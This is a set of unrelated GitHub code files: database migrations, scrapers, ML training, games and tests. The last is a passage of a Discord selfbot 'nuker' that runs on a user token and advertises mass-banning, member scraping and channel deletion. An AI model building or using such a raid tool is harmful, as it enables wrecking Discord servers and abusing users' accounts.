upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('venue_genre',\n sa.Column('venue_id', sa.Integer(), nullable=False),\n sa.Column('genre_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['genre_id'], ['Artist.id'], ),\n sa.ForeignKeyConstraint(['venue_id'], ['Venue.id'], ),\n sa.PrimaryKeyConstraint('venue_id', 'genre_id')\n )\n op.drop_constraint('Artist_genre_id_fkey', 'Artist', type_='foreignkey')\n op.drop_column('Artist', 'genre_id')\n op.alter_column('Genre', 'name',\n existing_type=sa.VARCHAR(),\n nullable=True)\n op.drop_constraint('Venue_genre_id_fkey', 'Venue', type_='foreignkey')\n op.drop_column('Venue', 'genre_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('Venue', sa.Column('genre_id', sa.INTEGER(), autoincrement=False, nullable=False))\n op.create_foreign_key('Venue_genre_id_fkey', 'Venue', 'Genre', ['genre_id'], ['id'])\n op.alter_column('Genre', 'name',\n existing_type=sa.VARCHAR(),\n nullable=False)\n op.add_column('Artist', sa.Column('genre_id', sa.INTEGER(), autoincrement=False, nullable=False))\n op.create_foreign_key('Artist_genre_id_fkey', 'Artist', 'Genre', ['genre_id'], ['id'])\n op.drop_table('venue_genre')\n # ### end Alembic commands ###\n","repo_name":"JosephMugo/fyyur","sub_path":"migrations/versions/ed8b788fd93d_.py","file_name":"ed8b788fd93d_.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"9862072086","text":"\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom fake_useragent import UserAgent\n\nua = UserAgent()\nheader = {'User-Agent': str(ua.random)}\n\npairs = ['JPY', 'USD', 'EUR', 'GBP', 'CAD', 'AUD']\ninvesting_data = []\nfor pair in pairs:\n BASE_URL = 'https://kr.investing.com/currencies/{}-{}'.format(pair.lower(), 'krw')\n url = Request(BASE_URL, headers=header)\n html = urlopen(url)\n\n if html.status == 200:\n print('인베스팅')\n soup = BeautifulSoup(html, 'html.parser')\n element = soup.find('span', {'data-test': 'instrument-price-last'})\n if pair == 'JPY':\n investing_data.append(round(float(element.text.replace(',', '')) * 100, 2))\n print(investing_data)\n else:\n investing_data.append(round(float(element.text.replace(',', '')), 2))\n print(investing_data)\n else:\n req_flag = 1\n # bot.send_message(chat_id=CHK_CHAT_ID, text=str(html.status) + ' 인베스팅 크롤링 실패...')\n\n\n","repo_name":"electricalboy1991/Dollar_future","sub_path":"230816_Investing_exchange_rate.py","file_name":"230816_Investing_exchange_rate.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25723850844","text":"import pymongo\r\nfrom pymongo.server_api import ServerApi\r\n\r\nclient = pymongo.MongoClient(\"mongodb+srv://insira-seu-usuario:insira-a-senha@cluster0.tjdbym4.mongodb.net/?retryWrites=true&w=majority\", server_api=ServerApi('1'))\r\ndb = client.test\r\n\r\nnome_db = 'db_youtube1'\r\ndb[nome_db].drop()\r\n\r\nprint(f'\\nREMOÇAO DO BANCO DE DADOS \"{nome_db}\" REALIZADO COM SUCESSO\\n')\r\n\r\n\r\nnome_db = 'db_youtube2'\r\ndb[nome_db].drop()\r\n\r\nprint(f'\\nREMOÇAO DO BANCO DE DADOS \"{nome_db}\" REALIZADO COM SUCESSO\\n')","repo_name":"carlosfalcone/ConsumindoApiYoutube","sub_path":"Remocao_Youtube3-entrega.py","file_name":"Remocao_Youtube3-entrega.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71593176256","text":"import sacrebleu\n\n# data_dir = 'data'\ndata_dir = 'data-illegal-immigrant-512'\n\ndef compute_bleu(pred_path, ref_path):\n\n with open(pred_path) as f:\n pred = f.readlines()\n\n with open(ref_path) as f:\n ref = f.readlines()\n\n bleu = sacrebleu.corpus_bleu(pred, [ref])\n print(bleu.score)\n\n\nif __name__ == '__main__':\n compute_bleu(pred_path=f'./{data_dir}/predict5.tok.en', ref_path=f'./{data_dir}/test.tok.en')\n","repo_name":"JunW15/AdvMT","sub_path":"defences/dp/opennmt-iwslt/get_bleu.py","file_name":"get_bleu.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 
+{"seq_id":"16706785229","text":"import sys\nimport os\nimport pygame\nfrom goal import Goal\nfrom player import Player\nimport numpy as np\nimport random\n\nos.environ['SDL_VIDEO_CENTERED'] = '1'\npygame.init()\n\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGREEN = 94, 230, 130\nRED = 230, 94, 94\nBLUE = 94, 173, 230\nBLOCK_SIZE = 20, 20\nNUM_OBSTACLES = 100\nSCREEN_SIZE = SCREEN_WIDTH, SCREEN_HEIGHT = 300, 300\nfont_size = 36\nmargin = 100\n\nEPISODES = 24000\nSHOW_EVERY = 3000\nMOVE_PENALTY = 1\nGOAL_REWARD = 25\nOUT_OF_BOUNDS_PENALTY = 200\nOBSTACLE_HIT_PENALTY = 300\nEPS_DECAY = 0.9999\nLEARNING_RATE = 0.1\nDISCOUNT = 0.95\nQ_TABLE_SIZE = (SCREEN_WIDTH // BLOCK_SIZE[0] + 2, SCREEN_HEIGHT // BLOCK_SIZE[1] + 2, 4)\nepsilon = 0.5\nq_table = np.zeros(Q_TABLE_SIZE)\n\nscreen = pygame.display.set_mode(SCREEN_SIZE)\nclock = pygame.time.Clock()\nfont = pygame.font.Font(None, font_size)\n\ngoal = Goal(SCREEN_WIDTH, SCREEN_HEIGHT, GREEN)\ngoal_rect = goal.get_rect()\nobstacle_rects = [pygame.Rect((random.randrange(0, SCREEN_WIDTH, BLOCK_SIZE[0]), random.randrange(0, SCREEN_HEIGHT, BLOCK_SIZE[1])), BLOCK_SIZE) for i in range(NUM_OBSTACLES)]\nwhile goal_rect in obstacle_rects:\n goal.change_pos(SCREEN_WIDTH, SCREEN_HEIGHT)\n goal_rect = goal.get_rect()\n\ndef gameInit():\n global player \n global player_rect\n global goal_reached \n global out_of_bounds\n\n player = Player(SCREEN_WIDTH, SCREEN_HEIGHT, WHITE)\n player_rect = player.get_rect()\n goal_reached = False\n out_of_bounds = False\n\n\ndef check_boundaries(head):\n if head.left < 0 or head.right > SCREEN_WIDTH or head.top < 0 or head.bottom > SCREEN_HEIGHT:\n return True\n return False\n\n\ndef setSpeedFromAction(action):\n if action == 0:\n player.set_speed([20, 0]) \n elif action == 1:\n player.set_speed([-20, 0])\n elif action == 2:\n player.set_speed([0, 20])\n elif action == 3:\n player.set_speed([0, -20])\n \n \ndef coordsToState(coords):\n return coords[0] // 20 + 1, coords[1] // 20 + 1\n\n\ndef check_reached_goal(player_rect, goal_rect):\n if player_rect.colliderect(goal_rect):\n return True\n return False\n\n\ndef check_hit_obstacle(player_rect, obstacle_rects):\n if player_rect.collidelist(obstacle_rects):\n return True\n return False\n\n\nfor episode in range(EPISODES):\n if episode % SHOW_EVERY == 0:\n show = True\n else:\n show = False\n\n gameInit()\n\n for i in range(200):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n current_state = coordsToState(player.get_coords())\n \n if np.random.random() > epsilon:\n action = np.argmax(q_table[current_state])\n else:\n action = np.random.randint(0, 4)\n \n setSpeedFromAction(action)\n player.move()\n player_rect = player.get_rect()\n player_coords = player.get_coords()\n out_of_bounds = check_boundaries(player_rect)\n goal_reached = check_reached_goal(player_rect, goal_rect)\n obstacle_hit = check_hit_obstacle(player_rect, obstacle_rects)\n\n if out_of_bounds:\n q_table[current_state + (action,)] = -OUT_OF_BOUNDS_PENALTY\n break\n elif goal_reached:\n reward = GOAL_REWARD\n elif obstacle_hit:\n reward = -OBSTACLE_HIT_PENALTY\n else:\n reward = -MOVE_PENALTY\n \n new_state = coordsToState(player_coords)\n max_future_q = np.max(q_table[new_state])\n current_q = q_table[current_state + (action,)]\n\n if goal_reached:\n new_q = reward\n else:\n new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * (reward + DISCOUNT * max_future_q)\n\n q_table[current_state + (action,)] 
= new_q\n\n if show:\n screen.fill(BLACK)\n pygame.draw.rect(screen, goal.color, goal_rect)\n pygame.draw.rect(screen, player.color, player_rect)\n for i in range(NUM_OBSTACLES):\n pygame.draw.rect(screen, RED, obstacle_rects[i])\n visited_rects = player.get_visited_rects()\n for i in range(len(visited_rects)):\n pygame.draw.rect(screen, BLUE, visited_rects[i])\n pygame.display.update()\n clock.tick(100)\n \n if reward == GOAL_REWARD:\n break\n\n # print(f'Episode: {episode} Epsilon: {epsilon}')\n\n epsilon *= EPS_DECAY\n","repo_name":"njr3/Q_learning_pathfinder","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72403189694","text":"from threading import Thread\nimport socket\nimport time\nfrom datetime import datetime\n\nREQUEST = \"1\"\nGRANT = \"2\"\nRELEASE = \"3\"\n\nserver = (\"127.0.0.1\", 8080)\nbuffer_size = 1024\n\nUDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\ndef process(prcss, content, k, r):\n for ri in range(r):\n UDPClientSocket.sendto(str.encode(f\"{REQUEST}|{prcss}|{content}\"), server)\n loop_rcv = True\n while loop_rcv:\n rcv = UDPClientSocket.recvfrom(buffer_size)\n message = rcv[0].decode()\n address = rcv[1]\n message = message.split(\"|\")\n msg = message[0]\n prcss_rcv = message[1]\n if (msg == GRANT) and (prcss_rcv == prcss):\n with open('resultado.txt', 'a') as f:\n f.write(f\"{prcss} | {datetime.now().strftime('%H:%M:%S.%f')}\\n\")\n UDPClientSocket.sendto(str.encode(f\"{RELEASE}|{prcss}|{content}\"), server)\n loop_rcv = False\n time.sleep(k)\n\nif __name__ == \"__main__\":\n n = int(input(\"n: \"))\n r = int(input(\"r: \"))\n k = int(input(\"k: \"))\n\n for ni in range(n):\n Thread(target=process, args=(str(ni), \"00000\", k, r)).start()","repo_name":"ChristianNMoreira/SD-TP3","sub_path":"processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28787529431","text":"from factory import Factory\nfrom factory.fuzzy import FuzzyText, FuzzyInteger, FuzzyFloat\nimport pytest\nfrom pytest import fixture\n\nfrom IO_LOTTERY.domain import User\n\n\nclass UserFactory(Factory):\n class Meta:\n model = User\n\n first_name = FuzzyText()\n last_name = FuzzyText()\n email = FuzzyText()\n age = FuzzyInteger(low=0)\n essays_count = FuzzyInteger(low=0)\n rating = FuzzyFloat(low=0)\n\n\n@pytest.fixture\ndef user() -> User:\n return UserFactory()\n\n\ndef test_can_instantiate_user(user: User) -> None:\n assert isinstance(user, User)\n\n\ndef test_user_has_first_name_as_attribute(user: User) -> None:\n assert hasattr(user, 'first_name')\n assert isinstance(user.first_name, str)\n assert user.first_name\n","repo_name":"NiceoNN/IO_LOTTERY_","sub_path":"IO_LOTTERY/tests/unit/test_domain.py","file_name":"test_domain.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23723520949","text":"\nclass UpdateCourseName(Mutation):\n class Arguments:\n id = ID(required=True)\n name = String()\n courseCode = Int()\n\n courseName = Field(CourseNameType)\n message = String()\n def mutate(root, info, id, name=None, courseCode=None):\n oldCourseName = get_object_or_None(CourseName, pk=id)\n if oldCourseName:\n if name:\n oldCourseName.name = name\n if courseCode:\n oldCourseName.code = 
courseCode\n oldCourseName.save()\n return UpdateCourseName(courseName=oldCourseName)\n return UpdateCourseName(message=\"Failed - Object Not found\")\n\n\n\nclass UpdateCourse(Mutation):\n class Arguments:\n id = ID(required=True)\n courseName = ID()\n program = ID()\n\n course = Field(CourseType)\n message = String()\n def mutate(root, info, id, courseName=None, program=None):\n oldCourse = get_object_or_None(Course, pk=id)\n if oldCourse:\n if courseName:\n courseNameObject = get_object_or_None(CourseName, pk=courseName)\n if courseNameObject:\n oldCourse.course = courseNameObject\n if program:\n programObject = get_object_or_None(Program, pk=program)\n if programObject:\n oldCourse.program = programObject\n oldCourse.save()\n return UpdateCourse(course=oldCourse)\n return UpdateCourse(message=\"Failed - Object Not found\")\n\n","repo_name":"NobinKhan/UMSDB","sub_path":"academic/mutation/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11858154386","text":"# Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nfrom queue import Queue\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return an integer\r\n def coveredNodes(self, A):\r\n cover = 0\r\n uncover = 0\r\n q = Queue()\r\n q.put(A)\r\n level = 0\r\n while (q.empty()==False):\r\n n = q.qsize()\r\n for i in range(n):\r\n node = q.get()\r\n if (i == 0 or i == n - 1):\r\n uncover += node.val\r\n else:\r\n cover += node.val\r\n if (node.left != None):\r\n q.put(node.left)\r\n if (node.right != None):\r\n q.put(node.right)\r\n return abs(cover - uncover)\r\n","repo_name":"PrinceSinghhub/InterviewBit-Tree-Data-Structure","sub_path":"Interview Bit BST/Covered Uncovered Nodes.py","file_name":"Covered Uncovered Nodes.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71295583931","text":"# download packages\n#!pip install transformers==4.8.2\n\n# import packages\nimport os\nimport re\nimport torch\nimport random\nimport pandas as pd\nfrom kaggle.api.kaggle_api_extended import KaggleApi\n\n\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom transformers import GPT2Tokenizer, TrainingArguments, Trainer, GPT2LMHeadModel\n\n# Define class and functions\n# --------\n\n# Dataset class\n\n\nclass ArxivDataset(Dataset):\n def __init__(self, df, tokenizer, max_length):\n # define variables\n print(\"encoding data with tokenizer\")\n self.input_ids = []\n self.attn_masks = []\n self.labels = []\n # iterate through the dataset\n prep_txt = df.apply(\n lambda x: f'<|startoftext|> Categorie: {x.categories} \\nAbstract: {x.abstract}\\nTitle: {x.title}<|endoftext|>', axis=1)\n # tokenize,axis=1)\n for txt in prep_txt:\n # tokenize\n encodings_dict = tokenizer(txt, truncation=True,\n max_length=max_length, padding=\"max_length\")\n # append to list\n self.input_ids.append(torch.tensor(encodings_dict['input_ids']))\n self.attn_masks.append(torch.tensor(\n encodings_dict['attention_mask']))\n self.labels.append(txt.split(\"Title:\")[1].split(\"<\")[0])\n\n def __len__(self):\n return len(self.input_ids)\n\n def __getitem__(self, idx):\n return self.input_ids[idx], self.attn_masks[idx], 
self.labels[idx]\n\n# Data load functions\n\n\ndef download_arxiv_dataset():\n \"\"\"\n Access Kaggle API to download arxiv dataset\n \"\"\"\n api = KaggleApi()\n # authenticate your Kaggle account to use the api\n api.authenticate()\n # downloading from www.kaggle.com/datasets/Cornell-University/arxiv\n # (arxiv is a dataset, not a competition, so use the dataset endpoint)\n api.dataset_download_file(dataset='Cornell-University/arxiv',\n file_name='arxiv-metadata-oai-snapshot.json',\n path='./data/')\n\n\ndef process_arxiv_dataset():\n \"\"\"\n Select relevant field from full arxiv dataset to create condensed dataset.\n\n Since the arxiv dataset is 3.5 GB, and we only need a few fields,\n we process the dataset into a smaller set with only the relevant data. \n \"\"\"\n pass\n\n\ndef load_arxiv_dataset(tokenizer, samples=170000):\n # load dataset and sample a subset of papers\n if not os.path.exists(\"arxiv_metadata_small.csv\"):\n download_arxiv_dataset()\n process_arxiv_dataset()\n print(\"Loading data\")\n file_path = \"arxiv_metadata_small.csv\"\n df = pd.read_csv(file_path)\n df = df.sample(samples) # 350000, random_state=1)\n\n # divide into test and train\n X_train, X_test = \\\n train_test_split(df, shuffle=True, test_size=20,\n random_state=1) # , stratify=df['categories'])\n\n # format into SentimentDataset class\n train_dataset = ArxivDataset(X_train, tokenizer, max_length=1024)\n\n # return\n return train_dataset, X_test\n\n# Load model and data\n# --------\n\n\nsave_name = \"/home/alex/DeepLearning/sentiment_transformer/results/arxiv-model-medium-20220308\"\noverride = 0\nif os.path.exists(save_name) and override == False:\n model_name = save_name\n model = GPT2LMHeadModel.from_pretrained(model_name).cuda()\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2-medium', bos_token='<|startoftext|>',\n eos_token='<|endoftext|>', pad_token='<|pad|>')\n train_dataset, test_dataset = load_arxiv_dataset(tokenizer, samples=30)\n\nelse:\n # set model name\n model_name = \"gpt2-medium\"\n # seed\n torch.manual_seed(42)\n\n # load tokenizer and model\n tokenizer = GPT2Tokenizer.from_pretrained(model_name, bos_token='<|startoftext|>',\n eos_token='<|endoftext|>', pad_token='<|pad|>')\n model = GPT2LMHeadModel.from_pretrained(model_name).cuda()\n model.resize_token_embeddings(len(tokenizer))\n\n # prepare and load dataset\n train_dataset, test_dataset = load_arxiv_dataset(tokenizer)\n\n # Train\n # --------\n # creating training arguments\n training_args = TrainingArguments(output_dir='results', num_train_epochs=1, logging_steps=10,\n load_best_model_at_end=False, save_strategy=\"steps\", save_steps=55000, do_eval=False, evaluation_strategy=\"no\",\n per_device_train_batch_size=1, gradient_accumulation_steps=8,\n warmup_steps=100, weight_decay=0.001, logging_dir='logs')\n\n # start training\n print(\"Train model\")\n Trainer(model=model, args=training_args, train_dataset=train_dataset,\n data_collator=lambda data: {'input_ids': torch.stack([f[0] for f in data]),\n 'attention_mask': torch.stack([f[1] for f in data]),\n 'labels': torch.stack([f[0] for f in data])}).train()\n\n model.save_pretrained(save_name)\n# Test\n# set the model to eval mode\n_ = model.eval()\n\n# run model inference on all test data\noriginal_label, predicted_label, original_text, predicted_text = [], [], [], []\ntitles = test_dataset.title\ntest_txt = test_dataset.apply(\n lambda x: f'<|startoftext|> Categorie: {x.categories} \\nAbstract: {x.abstract}\\nTitle: ', axis=1)\n\nfor (txt, title) in zip(test_txt, titles):\n # generate tokens\n generated = tokenizer(f\"{txt}\", 
return_tensors=\"pt\").input_ids.cuda()\n # perform prediction\n MLE_output = model.generate(generated, max_length=1024,\n num_return_sequences=1, early_stopping=True, num_beams=30)\n random_outputs = model.generate(generated, max_length=1024, do_sample=True, top_p=0.9,\n temperature=1.5, num_return_sequences=4, early_stopping=True)\n # decode the predicted tokens into texts\n pred_texts_mle = [tokenizer.decode(\n decoded, skip_special_tokens=True) for decoded in MLE_output]\n pred_texts_random = [tokenizer.decode(\n decoded, skip_special_tokens=True) for decoded in random_outputs]\n # extract the predicted sentiment\n print(\"\\n\\n----------REAL----------\\n\", txt+title,\n \"\\n--------------Generated------------------\\n\")\n for pred in pred_texts_mle:\n print(\"\\nGenerated MLE Title:\", pred.split(\"\\nTitle:\")[1], \"\\n\")\n for pred in pred_texts_random:\n print(\"\\nGenerated random Title:\", pred.split(\"\\nTitle:\")[1], \"\\n\")\n","repo_name":"avvorstenbosch/Paper_Title_Recommender","sub_path":"arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21738728699","text":"\"\"\"\nDemonstration of transitions between scenes.\n\"\"\"\n\nimport cocos\nfrom cocos.director import director\nfrom cocos.scene import Scene\nfrom cocos.sprite import Sprite\nfrom cocos.layer import ColorLayer, Layer\nfrom cocos.scenes.transitions import *\n\nimport pyglet\nfrom pyglet.window import key\nfrom lib.listmenu import ListMenu\n\npyglet.resource.path = ['../animals']\npyglet.resource.reindex()\n\ntransitions = [\n 'RotoZoomTransition',\n 'JumpZoomTransition',\n 'SplitColsTransition',\n 'SplitRowsTransition',\n 'MoveInLTransition',\n 'MoveInRTransition',\n 'MoveInBTransition',\n 'MoveInTTransition',\n 'SlideInLTransition',\n 'SlideInRTransition',\n 'SlideInBTransition',\n 'SlideInTTransition',\n 'FlipX3DTransition',\n 'FlipY3DTransition',\n 'FlipAngular3DTransition',\n 'ShuffleTransition',\n 'ShrinkGrowTransition',\n 'CornerMoveTransition',\n 'EnvelopeTransition',\n 'FadeTRTransition',\n 'FadeBLTransition',\n 'FadeUpTransition',\n 'FadeDownTransition',\n 'TurnOffTilesTransition',\n 'FadeTransition',\n 'ZoomTransition',\n]\n\nclass Transitions(ListMenu):\n def __init__(self, *args, **kwargs):\n super(Transitions, self).__init__(transitions, wrap=True, *args, *kwargs)\n w, h = director.get_window_size()\n\n # Define three different sprites\n s0 = Sprite('cow-icon.png', position=(w//2, h//2), scale=2)\n s1 = Sprite('bird-icon.png', position=(w//2, h//2), scale=2)\n s2 = Sprite('parrot-icon.png', position=(w//2, h//2), scale=2)\n\n # Define three different scenes\n scene0 = Scene(ColorLayer(100, 0, 0, 255), s0, self)\n scene1 = Scene(ColorLayer(0, 100, 0, 255), s1, self)\n scene2 = Scene(ColorLayer(0, 0, 100, 255), s2, self)\n \n self.scenes = [scene0, scene1, scene2]\n self.scene_index = 0\n \n def cb(self):\n if self.k == key.ENTER:\n self.scene_index += 1\n self.scene_index %= len(self.scenes)\n scene = self.scenes[self.scene_index]\n transition = eval(self.item)\n director.replace(transition(scene, 1))\n\nif __name__ == '__main__':\n director.init(caption='Transitions', resizable=True)\n director.run(Transitions().scenes[0])\n","repo_name":"rasql/cocos2d-tutorial","sub_path":"examples/transitions.py","file_name":"transitions.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"25758360599","text":"# https://leetcode.com/problems/equal-row-and-column-pairs/\n\n# Time complexity O(n*n). Space complexity O(n).\nclass Solution:\n def equalPairs(self, grid: List[List[int]]) -> int:\n rows = defaultdict(int)\n result = 0\n for r in range(len(grid)):\n rows[tuple(grid[r])] += 1\n for c in range(len(grid[0])):\n col = []\n for r in range(len(grid)):\n col.append(grid[r][c])\n col = tuple(col)\n if col in rows:\n result += rows[col]\n return result\n","repo_name":"ioann7/problem_solving_on_leetcode","sub_path":"2023_June_daily_challenges/2352. Equal Row and Column Pairs.py","file_name":"2352. Equal Row and Column Pairs.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30081085821","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nimport asyncio \r\nimport random \r\nimport requests\r\nimport sys\r\nimport threading\r\nimport datetime\r\nimport json\r\nimport aiohttp\r\nimport io\r\nfrom colored import fg\r\np = fg('#5620db')\r\nm = fg('#7d5ad4')\r\nfrom colorama import Fore\r\nimport time\r\nimport urllib\r\n \r\nos.system('pip install -r requirements.txt')\r\nos.system('cls' if os.name == 'nt' else 'clear') \r\n\r\ntoken = \"\"\r\nprefix = \">\"\r\nintents = discord.Intents.all()\r\nintents.members = True \r\nprint(f\"\"\"\r\n{p}▄▄▄▄▄ ▄ •▄ ▄· ▄▌ \r\n{m}•██ ▪ █▌▄▌▪▐█▪██▌▪ \r\n{p} ▐█.▪ ▄█▀▄ ▐▀▀▄·▐█▌▐█▪ ▄█▀▄ \r\n{m} ▐█▌·▐█▌.▐▌▐█.█▌ ▐█▀·.▐█▌.▐▌\r\n{p} ▀▀▀ ▀█▄▀▪·▀ ▀ ▀ • ▀█▄▀▪\r\n\r\n- https://github.com/s3ng0n\r\n- S3ng0nDev\r\n- Prefix : {prefix}\"\"\")\r\n\r\n\r\ndef check_token():\r\n if requests.get(\"https://discord.com/api/v8/users/@me\", headers={\"Authorization\": f'{token}'}).status_code == 200:\r\n return \"user\"\r\n else:\r\n return \"bot\"\r\n\r\ntoken_type = check_token()\r\nintents = discord.Intents.all()\r\nintents.members = True\r\n\r\nif token_type == \"user\":\r\n headers = {'Authorization': f'{token}'}\r\n tokyo = commands.Bot(command_prefix=\">\", case_insensitive=False, self_bot=True, intents=intents)\r\nelif token_type == \"bot\":\r\n headers = {'Authorization': f'Bot {token}'}\r\n tokyo = commands.Bot(command_prefix=\">\", case_insensitive=False, intents=intents)\r\n\r\ntokyo.remove_command(name=\"help\") \r\n\r\n@tokyo.event\r\nasync def on_ready():\r\n print(f\"- Logged in as {tokyo.user}\")\r\n\r\n\r\n\r\n@tokyo.command()\r\nasync def nuking(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >massban\r\n\u001B[2;37m- Massbans user from server\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >scrape\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Scrapes member ID available in discord server\u001B[0m\u001B[2;37m\r\n\u001B[2;34m- >dc\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Delete channels from server\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >rc\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Rename all the channels available\u001B[0m\r\n\r\n\u001B[2;34mComing Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n```\r\n\"\"\")\r\n\r\n@tokyo.command()\r\nasync def help(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m ╔╦╗╔═╗╦╔═╦ ╦╔═╗\r\n ║ ║ ║╠╩╗╚╦╝║ ║\r\n ╩ ╚═╝╩ ╩ ╩ ╚═╝\r\n- https://github.com/s3ng0n\r\n------------------------------\r\n[+] Nuking\r\n[+] Fun\r\n[+] Utils\r\n------------------------------\r\n\u001B[0m\r\n```\r\n\"\"\")\r\n@tokyo.command()\r\nasync 
def fun(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >hack @user\r\n\u001B[2;37m- Does 1337 \"Hacking\" against user\r\n\u001B[2;34m- >cum\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Fun little command that makes you cum\u001B[0m\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >911\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Fun little command that makes you boom boom\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >magik\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Makes your pfp shit\r\n\u001B[0m\r\n\u001B[2;34mComing Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n```\r\n\"\"\")\r\n\r\n\r\n@tokyo.command()\r\nasync def utils(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >copy\r\n\u001B[2;37m- Clone discord server\r\n\u001B[2;34m- >hypesquad\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Changes hypesquad badge without answering any questions\u001B[0m\r\n\u001B[2;37m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >purge\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Clear your messages\u001B[0m\u001B[2;37m\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >play\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Get playing status\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >stop\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Remove playing status\u001B[0m\u001B[2;37m\r\n\u001B[0m\r\n\u001B[2;34mComing Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n``` \r\n\r\n \"\"\")\r\n\r\n\r\n@tokyo.command(aliases=['changehypesquad'])\r\nasync def hypesquad(ctx, house):\r\n await ctx.message.delete()\r\n request = requests.Session()\r\n headers = {\r\n 'Authorization':\r\n token,\r\n 'Content-Type':\r\n 'application/json',\r\n 'User-Agent':\r\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'\r\n }\r\n if house == \"bravery\":\r\n payload = {'house_id': 1}\r\n elif house == \"brilliance\":\r\n payload = {'house_id': 2}\r\n elif house == \"balance\":\r\n payload = {'house_id': 3}\r\n elif house == \"random\":\r\n houses = [1, 2, 3]\r\n payload = {'house_id': random.choice(houses)}\r\n try:\r\n request.post('https://discordapp.com/api/v8/hypesquad/online',\r\n headers=headers,\r\n json=payload,\r\n timeout=10)\r\n except Exception as e:\r\n print(f\"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}\" + Fore.RESET)\r\n\r\n@tokyo.command()\r\nasync def hack(ctx, user: discord.Member=None):\r\n await ctx.message.delete()\r\n gender = [\"Male\", \"Female\", \"Trans\", \"Other\", \"Retard\"]\r\n age = str(random.randrange(10, 25))\r\n height = ['4\\'6\\\"', '4\\'7\\\"', 